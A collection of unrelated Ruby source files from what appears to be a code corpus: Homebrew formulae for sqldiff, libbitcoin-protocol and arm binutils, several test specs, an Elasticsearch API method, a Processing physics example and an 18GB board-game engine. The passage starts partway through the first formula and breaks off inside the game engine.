  sha256 "25a3b9d08066b3a9003f06a96b2a8d1348994c29cc912535401154501d875324"
  license "blessing"

  livecheck do
    url "https://sqlite.org/index.html"
    regex(%r{href=.*?releaselog/v?(\d+(?:[._]\d+)+)\.html}i)
    # Release logs encode versions with underscores (e.g. 3_36_0).
    strategy :page_match do |page, regex|
      page.scan(regex).map { |match| match&.first&.gsub("_", ".") }
    end
  end

  bottle do
    sha256 cellar: :any_skip_relocation, arm64_big_sur: "21de15f86c125a02389a2dca0a7d53dc3dd01dddd6bcc38ceb7d322597a093de"
    sha256 cellar: :any_skip_relocation, big_sur: "90601ff9aed7b0638b959e765878f42e38430dead627adbb7d6b68530ecb0915"
    sha256 cellar: :any_skip_relocation, catalina: "8ccda1604107c379c4072127825ac3a1c042ad03ccb8d6f763335403ca01790c"
    sha256 cellar: :any_skip_relocation, mojave: "470d541de3685a5b7ba46a997e493e6a69faf1ff69d29b15dbbed0c1e10fd166"
  end

  uses_from_macos "tcl-tk" => :build
  uses_from_macos "sqlite" => :test

  # Only the sqldiff binary is built and installed, not the whole of SQLite.
  def install
    system "./configure", "--disable-debug", "--prefix=#{prefix}"
    system "make", "sqldiff"
    bin.install "sqldiff"
  end

  # Diff a database against itself and expect a no-change summary.
  test do
    dbpath = testpath/"test.sqlite"
    sqlpath = testpath/"test.sql"
    sqlpath.write "create table test (name text);"
    system "sqlite3 #{dbpath} < #{sqlpath}"
    assert_equal "test: 0 changes, 0 inserts, 0 deletes, 0 unchanged",
    shell_output("#{bin}/sqldiff --summary #{dbpath} #{dbpath}").strip
  end
end
| 38.47619 | 122 | 0.714728 |
268b7156f7c80ea48f3e5e6c6937c057a1a2f0de | 3,816 | # The Nature of Code
# PBox2D example
# An uneven surface boundary
# Box2D edge-chain terrain generated with Perlin noise.
class Surface
  include Processing::Proxy
  # We'll keep track of all of the surface points
  attr_reader :surface, :body, :box2d, :y, :width, :height

  def initialize(b2d)
    @box2d = b2d
    @surface = []
    @width = b2d.width
    @height = b2d.height
    # This is what box2d uses to put the surface in its world
    chain = ChainShape.new
    # Perlin noise argument
    xoff = 0.0
    # This has to go backwards so that the objects bounce off the top of the surface
    # This "edgechain" will only work in one direction!
    (width + 10).step(-10, -5) do |x|
      # Doing some stuff with perlin noise to calculate a surface that points down on one side
      # and up on the other
      @y = if x > width / 2
        100 + (width - x) * 1.1 + map1d(noise(xoff), (-1.0..1.0), (-80..80))
      else
        100 + x * 1.1 + map1d(noise(xoff), (-1.0..1.0), (-80..80))
      end
      # Store the vertex in screen coordinates
      surface << Vec2.new(x, y)
      # Move through perlin noise
      xoff += 0.1
    end
    # Build an array of vertices in Box2D coordinates
    # from the ArrayList we made
    vertices = []
    surface.each do |surf|
      vertices << box2d.processing_to_world(surf)
    end
    # Create the chain!
    chain.createChain(vertices, vertices.length)
    # The edge chain is now attached to a body via a fixture
    bd = BodyDef.new
    bd.position.set(0.0, 0.0)
    @body = box2d.createBody(bd)
    # Shortcut, we could define a fixture if we
    # want to specify frictions, restitution, etc.
    body.createFixture(chain, 1)
  end

  # A simple function to just draw the edge chain as a series of vertex points
  def display
    stroke_weight(2)
    stroke(0)
    fill(135, 206, 250)
    begin_shape
    vertex(width, 0) # extra vertices so we can fill sky
    surface.each do |v|
      vertex(v.x, v.y) # the mountain range
    end
    vertex(0, 0) # extra vertices so we can fill sky
    end_shape
  end
end
# A circular dynamic Box2D body rendered as an ellipse with a rotation marker.
class Particle
  include Processing::Proxy
  # We need to keep track of a Body
  attr_reader :body, :box2d, :x, :y, :r

  # Constructor
  def initialize(b2d, x, y, r)
    @box2d = b2d
    @x = x
    @y = y
    @r = r
    # This function puts the particle in the Box2d world
    make_body(x, y, r)
  end

  # This function removes the particle from the box2d world
  def kill_body
    box2d.destroy_body(body)
  end

  # Is the particle ready for deletion?
  def done
    pos = box2d.body_coord(body)
    # Is it off the bottom of the screen?
    return false unless pos.y > box2d.height + r * 2
    kill_body
    true
  end

  def display
    # We look at each body and get its screen position
    pos = box2d.body_coord(body)
    # Get its angle of rotation
    a = body.get_angle
    push_matrix
    translate(pos.x, pos.y)
    rotate(-a)
    fill(175)
    stroke(0)
    stroke_weight(1)
    ellipse(0, 0, r * 2, r * 2)
    # Let's add a line so we can see the rotation
    line(0, 0, r, 0)
    pop_matrix
  end

  # This function adds the rectangle to the box2d world
  def make_body(x, y, r)
    # Define and create the body
    bd = BodyDef.new
    bd.position = box2d.processing_to_world(x, y)
    bd.type = BodyType::DYNAMIC
    @body = box2d.create_body(bd)
    # Make the body's shape a circle
    cs = CircleShape.new
    cs.m_radius = box2d.scale_to_world(r)
    fd = FixtureDef.new
    fd.shape = cs
    # Parameters that affect physics
    fd.density = 1
    fd.friction = 0.01
    fd.restitution = 0.3
    # Attach fixture to body
    body.create_fixture(fd)
    # Give it a random initial velocity (and angular velocity)
    body.set_linear_velocity(Vec2.new(rand(-10..10), rand(5..10)))
    body.set_angular_velocity(rand(-10..10))
  end
end
| 27.652174 | 94 | 0.633386 |
084d1d0acf6cc1696134c504bdf540e887554860 | 3,099 | #
# Author:: Doug MacEachern (<[email protected]>)
# Copyright:: Copyright (c) 2010 VMware, Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'spec_helper'
# Bare stub so this spec can stub Chef::Util::Windows::NetGroup.new without
# loading the real Windows-only implementation.
class Chef
  class Util
    class Windows
      class NetGroup
      end
    end
  end
end
# Specs for the Windows group provider; all NetGroup calls are mocked.
describe Chef::Provider::Group::Windows do
  before do
    @node = Chef::Node.new
    @events = Chef::EventDispatch::Dispatcher.new
    @run_context = Chef::RunContext.new(@node, {}, @events)
    @new_resource = Chef::Resource::Group.new("staff")
    @net_group = mock("Chef::Util::Windows::NetGroup")
    Chef::Util::Windows::NetGroup.stub!(:new).and_return(@net_group)
    @provider = Chef::Provider::Group::Windows.new(@new_resource, @run_context)
  end

  describe "when creating the group" do
    it "should call @net_group.local_add" do
      @net_group.should_receive(:local_set_members).with([])
      @net_group.should_receive(:local_add)
      @provider.create_group
    end
  end

  describe "manage_group" do
    before do
      @new_resource.members([ "us" ])
      @current_resource = Chef::Resource::Group.new("staff")
      @current_resource.members [ "all", "your", "base" ]
      Chef::Util::Windows::NetGroup.stub!(:new).and_return(@net_group)
      @net_group.stub!(:local_add_members)
      @net_group.stub!(:local_set_members)
      @provider.current_resource = @current_resource
    end

    # append=false replaces the membership wholesale.
    it "should call @net_group.local_set_members" do
      @new_resource.stub!(:append).and_return(false)
      @net_group.should_receive(:local_set_members).with(@new_resource.members)
      @provider.manage_group
    end

    it "should call @net_group.local_add_members" do
      @new_resource.stub!(:append).and_return(true)
      @net_group.should_receive(:local_add_members).with(@new_resource.members)
      @provider.manage_group
    end

    # Fallback path: if adding raises, the provider sets the full member list.
    it "should call @net_group.local_set_members if append fails" do
      @new_resource.stub!(:append).and_return(true)
      @net_group.stub!(:local_add_members).and_raise(ArgumentError)
      @net_group.should_receive(:local_add_members).with(@new_resource.members)
      @net_group.should_receive(:local_set_members).with(@new_resource.members + @current_resource.members)
      @provider.manage_group
    end
  end

  describe "remove_group" do
    before do
      Chef::Util::Windows::NetGroup.stub!(:new).and_return(@net_group)
      @provider.stub!(:run_command).and_return(true)
    end

    it "should call @net_group.local_delete" do
      @net_group.should_receive(:local_delete)
      @provider.remove_group
    end
  end
end
| 32.621053 | 107 | 0.709584 |
5d98c953250ebc2c4dc717d71cd75e6db876f2a6 | 203 | require 'parslet'
# SelfML::Engines
#
# An engine is a Parslet transformation that converts a parsed SelfML tree
# into a concrete Ruby structure (document, array or hash).
module SelfML::Engines; end

require 'selfml/engines/document'
require 'selfml/engines/array'
require 'selfml/engines/hash'
| 18.454545 | 39 | 0.778325 |
626d6bb5208002e77068a0965b75b00e46d8c0e7 | 354 | require 'spec_helper_acceptance'
describe 'cis_hardening_setup_filesystem class' do
  context 'default parameters' do
    # Manifest under test. Previously `pp` was referenced without ever being
    # defined, so this example raised NameError instead of applying anything.
    let(:pp) { 'include cis_hardening_setup_filesystem' }

    it 'behaves idempotently' do
      idempotent_apply(pp)
    end
  end

  # Disable unused Filesystems - Section 1.1.1
  describe file('/etc/modprobe.d/CIS.conf') do
    it { should be_file }
    # `be_owned` (no argument) is not a Serverspec file matcher; assert the
    # expected owner explicitly instead.
    it { should be_owned_by('root') }
  end
end
e274ab38b9ef5e4508210d1884f294c9abf0a37d | 1,886 | class LibbitcoinProtocol < Formula
desc "Bitcoin Blockchain Query Protocol"
homepage "https://github.com/libbitcoin/libbitcoin-protocol"
url "https://github.com/libbitcoin/libbitcoin-protocol/archive/v3.6.0.tar.gz"
sha256 "fc41c64f6d3ee78bcccb63fd0879775c62bba5326f38c90b4c6804e2b9e8686e"
license "AGPL-3.0"
revision 8
bottle do
root_url "https://github.com/gromgit/homebrew-core-mojave/releases/download/libbitcoin-protocol"
rebuild 1
sha256 cellar: :any, mojave: "663c93e94d7e3b3a25bae86abf3fd9842b3c700b158c6e95c64d93800778c204"
end
depends_on "autoconf" => :build
depends_on "automake" => :build
depends_on "libtool" => :build
depends_on "pkg-config" => :build
# https://github.com/libbitcoin/libbitcoin-system/issues/1234
depends_on "[email protected]"
depends_on "libbitcoin"
depends_on "zeromq"
def install
ENV.cxx11
ENV.prepend_path "PKG_CONFIG_PATH", Formula["libbitcoin"].opt_libexec/"lib/pkgconfig"
system "./autogen.sh"
system "./configure", "--disable-dependency-tracking",
"--disable-silent-rules",
"--prefix=#{prefix}",
"--with-boost-libdir=#{Formula["[email protected]"].opt_lib}"
system "make", "install"
end
test do
boost = Formula["[email protected]"]
(testpath/"test.cpp").write <<~EOS
#include <bitcoin/protocol.hpp>
int main() {
libbitcoin::protocol::zmq::message instance;
instance.enqueue();
assert(!instance.empty());
assert(instance.size() == 1u);
}
EOS
system ENV.cxx, "-std=c++11", "test.cpp", "-o", "test",
"-I#{boost.include}",
"-L#{Formula["libbitcoin"].opt_lib}", "-lbitcoin",
"-L#{lib}", "-lbitcoin-protocol",
"-L#{boost.lib}", "-lboost_system"
system "./test"
end
end
| 34.290909 | 100 | 0.628844 |
387eb247428b6efb12d73cc86c0e2c64be275539 | 2,506 | require 'test_helper'
class MentorshipTest < Minitest::Test
  def setup
    VCR.use_cassette('airtable/mentorship/successful') do
      @successful_response = Airtable::Mentorship.new.mentor_request_data
    end
  end

  def test_mentor_request_data_returns_correct_keys
    # assert_equal reports expected vs. actual on failure, unlike the former
    # `assert a == b`, which only prints "Expected false to be truthy".
    assert_equal %i[mentors services skillsets], @successful_response.keys.sort
  end

  def test_mentor_request_data_returns_correct_mentor_data
    mentor = @successful_response[:mentors].first
    assert mentor[:id].present?
    assert mentor[:name].present?
  end

  def test_mentor_request_data_returns_correct_service_data
    service = @successful_response[:services].first
    assert service[:id].present?
    assert service[:name].present?
  end

  def test_mentor_request_data_returns_correct_skillset_data
    skillset = @successful_response[:skillsets].first
    assert skillset[:id].present?
    assert skillset[:name].present?
  end

  def test_429_raises_airtable_error
    VCR.use_cassette('airtable/mentorship/exceeded_rate_limit') do
      assert_raises Airtable::Error do
        Airtable::Mentorship.new.mentor_request_data
      end
    end
  end

  def test_create_mentor_request_creates_the_passed_mentor_request
    VCR.use_cassette('airtable/mentorship/post_successful') do
      request_body = {
        slack_user: 'test_case_1',
        services: 'rec3ZQMCQsKPKlE2C',
        skillsets: 'Java',
        additional_details: 'Some test description.',
        mentor_requested: 'rec0SDZDK2DiW4PY9'
      }
      response = Airtable::Mentorship.new.create_mentor_request(request_body)

      assert response['id'].present?
      # Airtable echoes linked/multi-select field values back as arrays.
      assert_equal request_body[:slack_user], response.dig('fields', 'Slack User')
      assert_equal [request_body[:services]], response.dig('fields', 'Service')
      assert_equal [request_body[:skillsets]], response.dig('fields', 'Skillsets')
      assert_equal request_body[:additional_details], response.dig('fields', 'Additional Details')
      assert_equal [request_body[:mentor_requested]], response.dig('fields', 'Mentor Requested')
    end
  end

  def test_format_for_posting_converts_comma_separated_string_into_array_of_strings
    instance = Airtable::Mentorship.new
    assert_equal ['this', 'and long'], instance.send(:format_for_posting, 'this , and long ')
    assert_equal %w[this that], instance.send(:format_for_posting, 'this,that')
    assert_equal %w[this], instance.send(:format_for_posting, 'this')
  end
end
| 32.545455 | 94 | 0.731445 |
f71d26344e32e3b35da2485933a300c73b776f31 | 3,222 | # Licensed to Elasticsearch B.V. under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch B.V. licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
module Elasticsearch
  module API
    module Indices
      module Actions
        # DEPRECATED Upgrades to the current version of Lucene.
        #
        # @option arguments [List] :index A comma-separated list of index names; use `_all` or empty string to perform the operation on all indices
        # @option arguments [Boolean] :allow_no_indices Whether to ignore if a wildcard indices expression resolves into no concrete indices. (This includes `_all` string or when no indices have been specified)
        # @option arguments [String] :expand_wildcards Whether to expand wildcard expression to concrete indices that are open, closed or both.
        #   (options: open,closed,hidden,none,all)
        # @option arguments [Boolean] :ignore_unavailable Whether specified concrete indices should be ignored when unavailable (missing or closed)
        # @option arguments [Boolean] :wait_for_completion Specify whether the request should block until the all segments are upgraded (default: false)
        # @option arguments [Boolean] :only_ancient_segments If true, only ancient (an older Lucene major release) segments will be upgraded
        # @option arguments [Hash] :headers Custom HTTP headers
        #
        # *Deprecation notice*:
        # The _upgrade API is no longer useful and will be removed. Instead, see _reindex API.
        # Deprecated since version 8.0.0
        #
        #
        # @see https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-upgrade.html
        #
        def upgrade(arguments = {})
          headers = arguments.delete(:headers) || {}
          arguments = arguments.clone
          index = arguments.delete(:index)

          # POST to "<indices>/_upgrade", or to the cluster-wide "_upgrade"
          # endpoint when no index was given.
          path = index ? "#{Utils.__listify(index)}/_upgrade" : '_upgrade'
          params = Utils.__validate_and_extract_params arguments, ParamsRegistry.get(__method__)

          perform_request(Elasticsearch::API::HTTP_POST, path, params, nil, headers).body
        end

        # Register this action with its valid params when the module is loaded.
        #
        # @since 6.2.0
        ParamsRegistry.register(:upgrade, %i[
          allow_no_indices
          expand_wildcards
          ignore_unavailable
          wait_for_completion
          only_ancient_segments
        ].freeze)
      end
    end
  end
end
| 43.540541 | 210 | 0.681254 |
edd2c1fbd77ef3f063b3f9735fa890ec1613a80d | 1,495 | class ArmLinuxGnueabihfBinutils < Formula
desc "FSF/GNU binutils for cross-compiling to arm-linux"
homepage "https://www.gnu.org/software/binutils/binutils.html"
url "https://ftp.gnu.org/gnu/binutils/binutils-2.35.tar.gz"
mirror "https://ftpmirror.gnu.org/binutils/binutils-2.35.tar.gz"
sha256 "a3ac62bae4f339855b5449cfa9b49df90c635adbd67ecb8a0e7f3ae86a058da6"
license "GPL-2.0"
livecheck do
url :stable
end
bottle do
sha256 "743bac0fdd042088a61631b9fca121fd89d0bab810a6814448a0b70897adc84c" => :catalina
sha256 "470b88640a1bbfafbb2bf219a9e8942ee9a0a376fa9b178a25d7edf52db63a87" => :mojave
sha256 "cfda8211e77355eb5548d7634e97e2d7d917de459c48245af2de34d01266c2b1" => :high_sierra
end
def install
ENV.cxx11
# Avoid build failure: https://sourceware.org/bugzilla/show_bug.cgi?id=23424
ENV.append "CXXFLAGS", "-Wno-c++11-narrowing"
system "./configure", "--disable-debug",
"--disable-dependency-tracking",
"--enable-deterministic-archives",
"--prefix=#{prefix}",
"--disable-werror",
"--target=arm-linux-gnueabihf",
"--enable-gold=yes",
"--enable-ld=yes",
"--enable-interwork"
system "make"
system "make", "install"
end
test do
assert_match "f()", shell_output("#{bin}/arm-linux-gnueabihf-c++filt _Z1fv")
end
end
| 35.595238 | 93 | 0.63612 |
ab4d115003c5bc43498b4d012d096f8af83fbdd4 | 744 | class Api::V1::MessagesController < ApplicationController
before_action :authenticate_with_token!
def index
if chat = Chat.find(chat_id)
render json: {
operation: :index,
status: :success,
data: {
chat: chat,
messages: chat.messages
},
}
else
render json: {
operation: :create,
status: :failed,
}
end
end
def create
message = Message.new(message_params.merge!({sender_id: current_user.id}))
render json: message.save
end
private
def message_params
params.require(:message).permit(:content, :chat_id).to_h
end
def chat_id
params[:chat_id] || params.require(:message).permit(:chat_id).to_h
end
end
| 20.108108 | 78 | 0.616935 |
b9b13a11addfa9fb5c45ba471a147ded2340762d | 80 | # frozen_string_literal: true
module RubygemsDownloads
  # Gem release version (semantic versioning); bumped on each release.
  VERSION = '0.1.3'
end
| 13.333333 | 29 | 0.7625 |
2844fb68e9644a93976a358b3e60f759fb008f97 | 509 | # frozen_string_literal: true
# typed: true
# compiled: true
# Compiler test fixture: the prop accessor below must be defined by
# sorbet-runtime at runtime, not emitted by the compiler.
class A < T::Struct
  extend T::Sig
  # Sorbet will generate a `sig` for the synthetic declaration of this function,
  # but the compiler will not emit the actual definition -- that work will be
  # done by sorbet-runtime, and therefore we should mimic the behavior of
  # sorbet-runtime here.
  prop :foo, String
end
# Inspect the runtime signature attached to the prop-generated reader; the
# printed values are compared against this test's expected output.
s = T::Utils.signature_for_method(A.instance_method(:foo))
p s.nil?
p s&.method&.name
p s&.method_name
p s&.return_type&.name
| 24.238095 | 80 | 0.730845 |
628662415804d2752db4404a84bbe1ad24834911 | 28,109 | # frozen_string_literal: true
require_relative '../base'
require_relative '../cities_plus_towns_route_distance_str'
require_relative '../trainless_shares_half_value'
require_relative 'meta'
require_relative 'entities'
require_relative 'map'
require_relative 'scenarios'
require_relative 'round/operating'
require_relative 'step/buy_sell_par_shares'
require_relative 'step/buy_train'
require_relative 'step/dividend'
require_relative 'step/emr_share_buying'
require_relative 'step/route'
require_relative 'step/special_choose'
require_relative 'step/special_token'
require_relative 'step/track_and_token'
require_relative 'step/waterfall_auction'
module Engine
module Game
module G18GB
class Game < Game::Base
include_meta(G18GB::Meta)
include CitiesPlusTownsRouteDistanceStr
include Entities
include Map
include Scenarios
include TrainlessSharesHalfValue
attr_reader :scenario
attr_accessor :train_bought
GAME_END_CHECK = { final_train: :current_or, stock_market: :current_or }.freeze
BANKRUPTCY_ALLOWED = false
BANK_CASH = 99_999
CURRENCY_FORMAT_STR = 'ยฃ%d'
CERT_LIMIT_INCLUDES_PRIVATES = false
PRESIDENT_SALES_TO_MARKET = true
MIN_BID_INCREMENT = 5
MUST_BID_INCREMENT_MULTIPLE = true
ONLY_HIGHEST_BID_COMMITTED = true
CAPITALIZATION = :full
SELL_BUY_ORDER = :sell_buy
SOLD_OUT_INCREASE = false
NEXT_SR_PLAYER_ORDER = :first_to_pass
MUST_SELL_IN_BLOCKS = true
SELL_AFTER = :any_time
TRACK_RESTRICTION = :restrictive
EBUY_OTHER_VALUE = false
HOME_TOKEN_TIMING = :float
DISCARDED_TRAINS = :remove
TILE_LAYS = [{ lay: true, upgrade: true }, { lay: true, upgrade: true }].freeze
IMPASSABLE_HEX_COLORS = %i[gray red].freeze
MARKET_SHARE_LIMIT = 100
SHOW_SHARE_PERCENT_OWNERSHIP = true
MARKET_TEXT = Base::MARKET_TEXT.merge(
unlimited: 'May buy shares from IPO in excess of 60%',
)
MARKET = [
%w[50o 55o 60o 65o 70p 75p 80p 90p 100p 115 130 145 160 180 200 220 240 265 290 320 350e 380e],
].freeze
STOCKMARKET_COLORS = Base::STOCKMARKET_COLORS.merge(
unlimited: :yellow,
)
EVENTS_TEXT = {
'float_60' =>
['Start with 60% sold', 'New corporations float once 60% of their shares have been sold'],
'float_10_share' =>
['Start as 10-share', 'New corporations are 10-share corporations (that float at 60%)'],
'remove_unstarted' =>
['Remove unstarted corps', 'Unstarted corporations are removed along with one 6X train each'],
}.freeze
STATUS_TEXT = Base::STATUS_TEXT.merge(
'bonus_20_20' => ['NS ยฃ20, EW ยฃ20', 'North-South bonus ยฃ20, East-West bonus ยฃ20'],
'bonus_20_30' => ['NS ยฃ20, EW ยฃ30', 'North-South bonus ยฃ20, East-West bonus ยฃ30'],
'bonus_20_40' => ['NS ยฃ20, EW ยฃ40', 'North-South bonus ยฃ20, East-West bonus ยฃ40'],
'only_pres_drop' => ['Only pres. sales drop', 'Only sales by corporation presidents drop the share price'],
).freeze
PHASES = [
{
name: '2+1',
train_limit: { '5-share': 3, '10-share': 4 },
tiles: [:yellow],
status: ['bonus_20_20'],
operating_rounds: 2,
},
{
name: '3+1',
on: '3+1',
train_limit: { '5-share': 3, '10-share': 4 },
tiles: %i[yellow green],
status: ['bonus_20_20'],
operating_rounds: 2,
},
{
name: '4+2',
on: '4+2',
train_limit: { '5-share': 2, '10-share': 3 },
tiles: %i[yellow green blue],
status: ['bonus_20_30'],
operating_rounds: 2,
},
{
name: '5+2',
on: '5+2',
train_limit: { '5-share': 2, '10-share': 3 },
tiles: %i[yellow green blue brown],
status: ['bonus_20_30'],
operating_rounds: 2,
},
{
name: '4X',
on: '4X',
train_limit: 2,
tiles: %i[yellow green blue brown],
status: ['bonus_20_30'],
operating_rounds: 2,
},
{
name: '5X',
on: '5X',
train_limit: 2,
tiles: %i[yellow green blue brown],
status: ['bonus_20_30'],
operating_rounds: 2,
},
{
name: '6X',
on: '6X',
train_limit: 2,
tiles: %i[yellow green blue brown gray],
status: %w[bonus_20_40 only_pres_drop],
operating_rounds: 2,
},
].freeze
TRAINS = [
{
name: '2+1',
distance: [
{
'nodes' => ['town'],
'pay' => 1,
'visit' => 1,
},
{
'nodes' => %w[city offboard town],
'pay' => 2,
'visit' => 2,
},
],
price: 80,
rusts_on: '4+2',
},
{
name: '3+1',
distance: [
{
'nodes' => ['town'],
'pay' => 1,
'visit' => 1,
},
{
'nodes' => %w[city offboard town],
'pay' => 3,
'visit' => 3,
},
],
price: 200,
rusts_on: '4X',
events: [
{
'type' => 'float_60',
},
],
},
{
name: '4+2',
distance: [
{
'nodes' => ['town'],
'pay' => 2,
'visit' => 2,
},
{
'nodes' => %w[city offboard town],
'pay' => 4,
'visit' => 4,
},
],
price: 300,
rusts_on: '6X',
},
{
name: '5+2',
distance: [
{
'nodes' => ['town'],
'pay' => 2,
'visit' => 2,
},
{
'nodes' => %w[city offboard town],
'pay' => 5,
'visit' => 5,
},
],
price: 500,
events: [
{
'type' => 'float_10_share',
},
],
},
{
name: '4X',
distance: [
{
'nodes' => %w[city offboard],
'pay' => 4,
'visit' => 4,
},
{
'nodes' => ['town'],
'pay' => 0,
'visit' => 99,
},
],
price: 550,
},
{
name: '5X',
distance: [
{
'nodes' => %w[city offboard],
'pay' => 5,
'visit' => 5,
},
{
'nodes' => ['town'],
'pay' => 0,
'visit' => 99,
},
],
price: 650,
available_on: '4X',
},
{
name: '6X',
distance: [
{
'nodes' => %w[city offboard],
'pay' => 6,
'visit' => 6,
},
{
'nodes' => ['town'],
'pay' => 0,
'visit' => 99,
},
],
price: 700,
events: [
{
'type' => 'remove_unstarted',
},
],
available_on: '5X',
},
].freeze
def init_scenario(optional_rules)
num_players = @players.size
two_east_west = optional_rules.include?(:two_player_ew)
four_alternate = optional_rules.include?(:four_player_alt)
case num_players
when 2
SCENARIOS[two_east_west ? '2EW' : '2NS']
when 3
SCENARIOS['3']
when 4
SCENARIOS[four_alternate ? '4Alt' : '4Std']
when 5
SCENARIOS['5']
else
SCENARIOS['6']
end
end
def init_optional_rules(optional_rules)
optional_rules = super(optional_rules)
@scenario = init_scenario(optional_rules)
optional_rules
end
def optional_hexes
case @scenario['map']
when '2NS'
self.class::HEXES_2P_NW
when '2EW'
self.class::HEXES_2P_EW
else
self.class::HEXES
end
end
def num_trains(train)
@scenario['train_counts'][train[:name]]
end
def game_cert_limit
@scenario['cert-limit']
end
VALID_ABILITIES_OPEN = %i[blocks_hexes choose_ability reservation].freeze
VALID_ABILITIES_CLOSED = %i[hex_bonus reservation tile_lay token].freeze
def abilities(entity, type = nil, time: nil, on_phase: nil, passive_ok: nil, strict_time: nil)
return if entity&.player?
ability = super
return ability unless entity&.company?
return unless ability
valid = entity.value.positive? ? VALID_ABILITIES_OPEN : VALID_ABILITIES_CLOSED
valid.include?(ability.type) ? ability : nil
end
def remove_blockers!(company)
ability = abilities(company, :blocks_hexes)
return unless ability
ability.hexes.each do |hex|
hex_by_id(hex).tile.blockers.reject! { |c| c == company }
end
company.remove_ability(ability)
end
def close_company(company)
@bank.spend(company.revenue, company.owner)
@log << "#{company.name} closes, paying #{format_currency(company.revenue)} to #{company.owner.name}"
remove_blockers!(company)
company.revenue = 0
company.value = 0
end
def close_company_in_hex(hex)
@companies.each do |company|
block = abilities(company, :blocks_hexes)
close_company(company) if block&.hexes&.include?(hex.coordinates)
end
end
def game_companies
scenario_comps = @scenario['companies']
self.class::COMPANIES.select { |comp| scenario_comps.include?(comp[:sym]) }
end
def game_corporations
scenario_corps = @scenario['corporations'] + @scenario['corporation-extra'].sort_by { rand }.take(1)
self.class::CORPORATIONS.select { |corp| scenario_corps.include?(corp[:sym]) }
end
def game_tiles
if @scenario['gray-tiles']
self.class::TILES.merge(self.class::GRAY_TILES)
else
self.class::TILES
end
end
def init_starting_cash(players, bank)
cash = @scenario['starting-cash']
players.each do |player|
bank.spend(cash, player)
end
end
def setup
tiers = {}
delayed = 0
@corporations.sort_by { rand }.each do |corp|
if (corp.id != 'LNWR') && (delayed < @scenario['tier2-corps'])
tiers[corp.id] = 2
delayed += 1
else
tiers[corp.id] = 1
end
end
tier1, tier2 = tiers.partition { |_co, tier| tier == 1 }
@log << "Corporations available SR1: #{tier1.map(&:first).sort.join(', ')}"
@log << "Corporations available SR2: #{tier2.map(&:first).sort.join(', ')}"
@tiers = tiers
@insolvent_corps = []
@train_bought = false
end
def event_float_60!
@log << '-- Event: New corporations float once 60% of their shares have been sold --'
@corporations.reject(&:floated?).each { |c| c.float_percent = 60 }
end
def event_float_10_share!
@log << '-- Event: Unstarted corporations are converted to 10-share corporations --'
@corporations.reject(&:floated?).each { |c| convert_to_ten_share(c) }
end
def event_remove_unstarted!
@log << '-- Event: Unstarted corporations are removed --'
remove_trains = @depot.trains.select { |t| t.name == '6X' }
@corporations.reject(&:floated?).each do |corporation|
close_corporation(corporation, quiet: true)
if (train = remove_trains.pop)
@depot.remove_train(train)
@log << "#{corporation.id} closes, removing a 6X train"
else
@log << "#{corporation.id} closes"
end
end
end
def sorted_corporations
case @round
when Engine::Round::Stock
ipoed, others = @corporations.reject { |corp| @tiers[corp.id] > @round_counter }.partition(&:ipoed)
ipoed.sort + others
when Engine::Round::Operating
[@round.current_operator]
else
[]
end
end
def required_bids_to_pass
@scenario['required_bids']
end
def new_auction_round
Engine::Round::Auction.new(self, [
Engine::Step::CompanyPendingPar,
G18GB::Step::WaterfallAuction,
])
end
def init_round_finished
@players.sort_by! { |p| [p.cash, [email protected] { |c| c.owner == p }] }
end
def check_new_layer; end
def par_prices(_corp)
stock_market.par_prices
end
def lnwr_ipoed?
@corporations.find { |corp| corp.id == 'LNWR' }&.ipoed
end
def married_to_lnwr(player)
return false if lnwr_ipoed?
@companies.any? { |co| co.owner == player && co.sym == 'LB' }
end
def can_par?(corporation, player)
return true if lnwr_ipoed?
if married_to_lnwr(player)
# player owns the LB so can only start the LNWR
corporation.id == 'LNWR'
else
# player doesn't own the LB so can start any except the LNWR
corporation.id != 'LNWR'
end
end
def non_president_sales_drop_price?
[email protected]?('only_pres_drop')
end
def num_certs(entity)
entity.shares.sum(&:cert_size)
end
def sell_shares_and_change_price(bundle, allow_president_change: true, swap: nil)
corporation = bundle.corporation
price = corporation.share_price.price
was_president = corporation.president?(bundle.owner)
@share_pool.sell_shares(bundle, allow_president_change: allow_president_change, swap: swap)
bundle.num_shares.times { @stock_market.move_down(corporation) } if non_president_sales_drop_price? || was_president
log_share_price(corporation, price)
end
def insolvent?(corp)
@insolvent_corps.include?(corp)
end
def make_insolvent(corp)
return if insolvent?(corp)
@insolvent_corps << corp
@log << "#{corp.name} is now Insolvent"
end
def clear_insolvent(corp)
return unless insolvent?(corp)
@insolvent_corps.delete(corp)
@log << "#{corp.name} is no longer Insolvent"
end
def status_array(corp)
status = []
status << %w[10-share bold] if corp.type == :'10-share'
status << %w[5-share bold] if corp.type == :'5-share'
status << %w[Insolvent bold] if insolvent?(corp)
status << %w[Receivership bold] if corp.receivership?
status
end
def float_corporation(corporation)
super
return unless corporation.type == :'10-share'
bundle = ShareBundle.new(corporation.shares_of(corporation))
@share_pool.transfer_shares(bundle, @share_pool)
end
def place_home_token(corporation)
return if corporation.tokens.first&.used
hex = hex_by_id(corporation.coordinates)
tile = hex&.tile
if !tile || (tile.reserved_by?(corporation) && !tile.paths.empty?)
# If the tile has no paths at the present time, clear up the ambiguity when the tile is laid
# Otherwise, for yellow tiles the corporation is placed disconnected and for other tiles it
# chooses now
if tile.color == :yellow
cities = tile.cities
city = cities[1]
token = corporation.find_token_by_type
return unless city.tokenable?(corporation, tokens: token)
@log << "#{corporation.name} places a token on #{hex.name}"
city.place_token(corporation, token)
else
@log << "#{corporation.name} must choose city for home token"
@round.pending_tokens << {
entity: corporation,
hexes: [hex],
token: corporation.find_token_by_type,
}
end
return
end
cities = tile.cities
city = cities.find { |c| c.reserved_by?(corporation) } || cities.first
